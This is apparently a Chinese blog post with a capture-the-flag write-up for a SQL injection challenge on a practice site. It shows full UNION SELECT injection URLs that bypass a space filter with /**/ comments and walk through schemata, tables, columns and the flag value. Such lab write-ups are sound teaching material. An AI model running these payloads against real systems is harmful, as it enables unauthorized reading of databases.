CFT每日一题之简单的SQL注入之二

最新推荐文章于 2024-01-11 08:48:39 发布
最新推荐文章于 2024-01-11 08:48:39 发布
阅读量905 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaotu0821/article/details/80800483
版权

首先,输入1 尝试一下


然后爆出ID 加 个 单引号 尝试 ,出现报错界面

然后 大概猜测代码是  select xx from XX where id=''

用and测试

发现了有过滤,经过多测实验后,发现去掉空格就可以


然后开始构造,我们可以使用/**/来代替空格

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/%271%27=%271

然后就可以一层一层往下查了

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/%271%27=%271


然后查询列,获得flag列

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/%271%27=%271


最后查询flag列的数据

http://ctf5.shiyanbar.com/web/index_2.php?id=-11%27/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/%271%27=%271


王先生的王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF 大赛专用工具
06-05
本工具不是本人专有,这个是我通过平常整理收集的一些专用且常用的工具
SQL注入漏洞笔记
weixin_43608762的博客
11-13 167
一:注入原理 SQL注入是一种常见的Web安全漏洞,攻击者利用这个问题,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击 SQL注入是一种将SQL语句插入或天机到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行 常见的web架构 表示层 :访问网址 逻辑层:加载,变异并执行脚本 存储层:执行SQL 那里存在SQL注入 GET POST HTTP头部注...
面试常问必备之MySQL面试55题.zip
06-30
面试常问必备之MySQL面试55题.zip
面试必备之乐观锁与悲观锁.zip
06-30
面试必备之乐观锁与悲观锁.zip
CFT的一类新的可积分变形
04-24
我们利用左右不对称测量,基于通用半简单群G的当前代数理论构造了一类新的可积σ模型。 可以将它们的作用视为两个独立的WZW模型对G的全循环有效作用,它们都处于k级,受到当前双线性混合不同WZW模型的干扰。 揭示了耦合参数空间中的非摄动对称性。 我们对动作进行了汉密尔顿分析,并在几种情况下证明了可集成性。 当G / H是对称空间时,我们将构造扩展到G / H CFT的变形,并显示出可积性。 我们的方法类似于用于构造λ变形的可积分σ模型的方法,但是结果是新颖的。
IBM使用的CFT工具
10-08
一个IBM服务器使用的PE工具,台式机和笔记本也可以使用
【writeup】网安实验室hackinglab 注入类
Oliver99877的博客
10-12 439
【题目1】 最简单SQL注入 分值: 100 最简单SQL注入 【思路】 本题未做任何防护,可以考虑在用户名处:1' or 1=1 -- 通过闭合单引号,然后注释掉后面原有的单引号来注入 密码随便填写即可 【题目2】 最简单SQL注入(熟悉注入环境) 分值: 100 最简单SQL注入 【思路】 1.index.php?id=1'...
hackinglab-注入关-第1题
u012851380的博客
11-20 855
输入用户名、密码为admin’ or ‘1’='1 flag出现
一线互联网企业面试题(仅参考未整理答案).zip
06-30
一线互联网企业面试题(仅参考未整理答案).zip
面试常问必备之Redis面试专题.zip
06-30
面试常问必备之Redis面试专题.zip
SQL注入—Sqli-labs注入环境搭建
u011417723的博客
03-04 1142
SQL注入—Sqli-labs注入环境搭建
四种防止SQL注入的解决方案
最新发布
weixin_43702295的博客
01-11 2487
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。这个id从请求参数中获取,若参数被拼接为:此时,数据库的数据都会被清空掉,后果非常严重PreparedStatement防止SQL注入mybatis中#{}防止SQL注入对请求参数的敏感词汇进行过滤。
CTF每日一题之robots访问
xiaotu0821的博客
08-09 3235
刚开始只是给了这么一个提示  看的我一脸蒙蔽,怎么没有提交的地方,不用提交flag,说是访问robots.txt,也没说访问哪个网站的,嗯,先看看源码,没啥发现,想想可能是我想太多了,我先进一下本网站的robots看一下好了 嗯,给了一个链接,不管了,先访问一下 哎哟哟哟,通过了,好吧,通过了那就通过了,就这样吧。 end...
CTF每日一题之查看源码
xiaotu0821的博客
08-10 2347
哎,也不管简单还是困难了,反正从里面随机点一个题吧,反正我英文也不好,也不认识题目 233333 看了一下题目,嗯,让从源码里找东西 一开始以为是一个存在于另一个网页里,在源码里翻了很久,除了几个指向github的链接,没有什么收获,嗯,我翻,我在翻,好吧,还是没有,然后重新回到题目页面,又看了一遍题,想了一下,会不会有什么隐藏的标签,然后换了一个思路,打开了审查元素,然后看到了这货 ...
CTF每日一题之图片信息查看
xiaotu0821的博客
08-10 2014
题目的要求大概就是从图片信息里查看答案  题目地址:http://www.wechall.net/challenge/training/stegano1/index.php  直接图片另存到本地,然后使用文本模式打开图片,发现密码 然后复制下来,提交,ok ...
CFT每日一题之 天下武功,唯快不破
xiaotu0821的博客
06-21 1725
首先,进入题目页面,大意就是说,你必须足够快(二十年没白撸的那种)一开始以为是页面重定向,然后抓包   欸,在响应包里发现了什么 FLAG ,没错,就是FLAG,这还不是美滋滋,复制提交 。哎,卧槽,不对,肯定是网络问题,再提交,还不对,思考三秒,哦,知道了,肯定是没解密,看到==两个符号,大概是base64 ,放hackbar里解密一下,将解密后的flag提交,依然不对。刷新页面 重新抓包,发现...
CTF每日一题之求素数
xiaotu0821的博客
08-20 641
 大概翻译一下就是说,求一百万以后的两个素数,素数本身的位数加起来也得是素数 就是 23 是个宿舍 2+3 为5 5也是素数,这样 ok,1百万以后,这种题,默默的打开QT ,想了一下还是关了,默默的打开pycharm 。 代码贴上: from math import sqrt def is_prime(n): if n == 1: return False ...
CTF每日一题之ACII码编码
xiaotu0821的博客
08-09 592
好久没写了。。。因为好久没做题了,最近又开始偷懒了,愁人。今天发现了一个新的CTF平台,很有意思,不过缺点是没有中文,不过这没有关系,谁叫我谷歌翻译用的贼6,今天是个签到题,就不多说了。 题目链接:http://www.wechall.net/en/challenge/training/encodings/ascii/index.php   要不要这么赤裸裸,算了,谁让我难度用的最低呢,...
cft v1.7 pe下载
07-10
CFT V1.7 PE是一个非常常用的电脑软件,广泛用于数据传输和通信领域。这个软件具有很多功能,可以帮助用户实现高效的数据传输和通信操作。 如果你想下载CFT V1.7 PE,可以通过以下几种方式来获取: 1. 官方网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值